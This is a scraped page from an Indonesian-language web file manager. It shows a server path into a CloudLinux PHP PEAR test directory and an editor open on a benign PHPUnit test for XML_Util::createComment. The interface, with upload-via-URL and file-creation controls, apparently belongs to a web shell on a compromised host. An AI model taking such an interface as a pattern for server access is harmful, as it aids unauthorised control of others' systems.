CURRENT PATH:
/
opt
/
cloudlinux
/
alt-php85
/
root
/
usr
/
share
/
pear
/
test
/
XML_Util
/
tests
/
KEMBALI
|
HOME
Upload File Local:
Upload
Upload via URL:
Download
Dir Baru
File Baru
Editing:
CreateCommentTests.php
<?php class CreateCommentTests extends AbstractUnitTests { /** * @covers XML_Util::createComment() */ public function testCreateCommentBasicUsage() { $original = "I am comment."; $expected = "<!-- I am comment. -->"; $this->assertEquals($expected, XML_Util::createComment($original)); } }
SIMPAN
BATAL